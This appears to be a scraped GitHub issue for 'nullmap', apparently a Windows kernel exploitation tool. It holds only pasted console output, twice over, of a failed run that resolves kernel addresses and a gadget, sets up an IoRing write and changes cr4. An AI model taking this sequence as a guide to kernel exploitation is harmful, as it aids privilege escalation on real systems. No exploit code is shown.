We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
`nullmap build on Mar 10 2023
[i] Reading driver file... [s] Driver timestamp: 1646500932 [i] Getting kernel base... [s] Kernel base: 0xFFFFF80309200000 [i] Getting win32k.sys base... [s] win32k.sys base: 0xFFFF9F268A3B0000 [i] Loading kernel image locally... [s] Local base: 0x00007FF6C6D80000 [i] Loading win32k.sys image locally... [s] Local base: 0x00007FF6C6D80000 [i] Resolving KeFlushCurrentTbImmediately... [s] KeFlushCurrentTbImmediately: 0x00007FF6C712D880 [i] Resolving gadget address... [s] Gadget: 0xFFFFF803095AD897 [i] Resolving jump address... [s] jmp rdx: 0xFFFFF8030953AB02 [i] Resolving NtGdiGetEmbUFI... [s] NtGdiGetEmbUFI: 0xFFFF9F268A41FF88 [i] Setting up IoRing exploit... [s] IORING_OBJECT: 0xFFFFC40F1D5616F0 [i] Writing into IoRing->RegBuffers... [s] Write successful [i] Changing cr4... [i] Reading original function address... [e] Failed to read function pointer! [e] Failed to call function!`
The text was updated successfully, but these errors were encountered:
No branches or pull requests
`nullmap
build on Mar 10 2023
[i] Reading driver file...
[s] Driver timestamp: 1646500932
[i] Getting kernel base...
[s] Kernel base: 0xFFFFF80309200000
[i] Getting win32k.sys base...
[s] win32k.sys base: 0xFFFF9F268A3B0000
[i] Loading kernel image locally...
[s] Local base: 0x00007FF6C6D80000
[i] Loading win32k.sys image locally...
[s] Local base: 0x00007FF6C6D80000
[i] Resolving KeFlushCurrentTbImmediately...
[s] KeFlushCurrentTbImmediately: 0x00007FF6C712D880
[i] Resolving gadget address...
[s] Gadget: 0xFFFFF803095AD897
[i] Resolving jump address...
[s] jmp rdx: 0xFFFFF8030953AB02
[i] Resolving NtGdiGetEmbUFI...
[s] NtGdiGetEmbUFI: 0xFFFF9F268A41FF88
[i] Setting up IoRing exploit...
[s] IORING_OBJECT: 0xFFFFC40F1D5616F0
[i] Writing into IoRing->RegBuffers...
[s] Write successful
[i] Changing cr4...
[i] Reading original function address...
[e] Failed to read function pointer!
[e] Failed to call function!`
The text was updated successfully, but these errors were encountered: